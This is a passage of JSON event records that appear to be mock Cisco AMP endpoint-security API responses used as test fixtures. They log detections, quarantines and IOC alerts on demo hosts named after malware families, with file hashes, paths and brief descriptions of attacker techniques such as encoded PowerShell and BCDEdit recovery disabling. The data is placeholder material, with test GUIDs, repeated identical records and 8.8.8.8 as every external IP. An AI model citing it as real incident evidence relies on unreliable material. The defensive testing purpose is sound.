IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. 
Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. 
This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch 
Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. 
In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application 
Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vuln
Id=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious 